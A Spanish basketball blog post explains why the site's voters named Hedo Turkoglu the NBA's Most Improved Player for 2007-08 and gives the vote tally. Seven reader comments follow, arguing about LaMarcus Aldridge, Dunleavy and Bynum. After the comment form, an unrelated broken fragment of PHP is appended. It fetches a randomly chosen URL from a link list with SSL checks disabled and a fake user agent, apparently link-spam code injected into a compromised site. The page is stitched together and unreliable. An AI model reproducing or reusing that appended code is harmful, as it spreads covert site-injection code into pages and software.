Los premios de la 2007-2008: Jugador con Mayor Progresión

28 de April de 2008 por MagicJohnson32

hedobuzzerceltsEn enero, el premio al Jugador con Mayor Progresión, que será anunciado por la NBA en breve, ya tenía dueño: Andrew Bynum. Lo suyo, más que una mejora, fue un advenimiento para los Lakers. Pero en enero, en un partido ante los Grizzlies, cayó sobre el pie de Odom, se dislocó la rótula y desde entonces no ha vuelto a jugar. Así, el camino al galardón quedó expedito para Hedo Turkoglu. El jugador de Orlando Magic no sólo ha dado un salto gigantesco en sus estadísticas sino que ha sido capaz de ejercer con frecuencia de líder de un equipo que cuenta con dos estrellas como Dwight Howard y Rashard Lewis. El internacional turco ha anotado canastas decisivas, como aquel memorable triple sobre la bocina para batir a los Celtics, y ha sido pieza fundamental en el tercer puesto del Este obtenido por su equipo. Turkoglu ha ofrecido esta temporada una nueva dimensión en juego, un nivel que no sospechábamos que pudiese alcanzar, y se ha consolidado esta temporada como un nombre de referencia en la liga.

Tras la lesión de Bynum, José Manuel Calderón se convirtió en el principal competidor de Turkoglu por el premio. Sin embargo, la inconsistencia del base extremeño en el tramo final de la temporada le dejan por detrás del turco. Merecen una mención Rajon Rondo, Mike Dunleavy y, especialmente, Lamarcus Aldridge, que ha elevado notablemente su juego este año y afronta con grandes perspectivas la temporada 2008-2009, en la que compartirá juego interior con Greg Oden.

Y el comité de sabios de TJNBA ha votado como Jugador con Mayor Progresión 2007-2008 a…

  1. Hedo Turkoglu 82
  2. José Manuel Calderón 33
  3. Lamarcus Aldridge 25
  4. Rajon Rondo 9
  5. Mike Dunleavy 6
  6. Andrew Bynum 5
  7. Rudy Gay 2
Comenta

7 comentarios a esta entrada

  1. Gallis dice:
    #1

    Coincido. ssin lesiones el premio era para Bynum. Sin el pívot angelino, el camino está expedito para el turco…

    Y yo haría mención especial para LaMarcus. Temporadón!!!

    Pero vamos, sota, caballo y rey, creo.

      Citar

  2. Viva_Dirk dice:
    #2

    La mejora de LaMarcus es mucho menos ‘real’, ha jugado casi 13 minutos mas que la temporada pasada y es sophomore, es decir, con mas minutos y ya un año de experiencia en la liga es normal que mejores.

    Trukoglu ha subido sus prestaciones y ha pasado de 31 minutos a 37 precisamente por esa subida de prestaciones.

    Por lo demás, ¡¡Dunleavy jugón!!

      Citar

  3. aro_pasado_no_newtoniano dice:
    #3

    yo responderé a lo minutos y prestanciones,,,cuando me digáis lo del huevo y la gallina..

      Citar

  4. Gallis dice:
    #4

    Claro, es que resulta que todos los jugadores que juegan 13 minutos más aumentan así sus prestaciones…y ese aumento de prestaciones no tiene nada que ver en el aumento de minutos…

    Y claro, en la temporada de Dunleavy no tienen nada que ver las lesiones de Maine y Tinsley…

      Citar

  5. Viva_Dirk dice:
    #5

    Si, Maine y Tinsley juegan de aleros los 2 :p Puede tener que ver lo que quieras, pero jugando lo mismo ha rendido mucho mas.

    Es que salvo este año, el jugador con mayor progresión viene siendo el jugador que de un año a otro pasa a jugar mucho por diferentes motivos.

      Citar

  6. Gallis dice:
    #6

    No, no juegan de aleros, pero cuando están en cancha suelen tener mucho más el balón que Diener y Foster, jojojojo…

      Citar

  7. TheDeerHunter dice:
    #7

    Ya es oficial el premio.

    Estaba bastante claro.

    El resto del pódium Rudy Gay y Lamarcus Aldridge.
    Se nos había caído Gay ¿se desprende de esto que le tenemos un poco de tirria por estos lares??

    Bynum es normal que no haya estado, por las lesiones digo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>